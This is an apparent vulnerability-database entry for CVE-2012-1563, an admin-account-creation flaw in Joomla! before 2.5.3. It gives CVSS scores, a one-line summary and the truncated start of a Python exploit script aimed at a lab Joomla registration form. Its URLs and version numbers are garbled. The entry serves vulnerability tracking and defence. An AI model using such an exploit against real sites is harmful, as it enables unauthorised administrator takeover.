7.5
CVSSv3

CVE-2012-1563

Published: 15/01/2020 Updated: 22/01/2020
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

Joomla! prior to 2.5.3 allows Admin Account Creation.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

joomla joomla!

Exploits

#!/usr/bin/python3 # CVE-2012-1563: Joomla! <= 252 Admin Creation # cf # Source: wwwambionicsio/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution import bs4 import requests import random url = 'vmweblan/joomla-cms-252/' form_url = url + 'indexphp/using-joomla/extensions/components/users-component/regi ...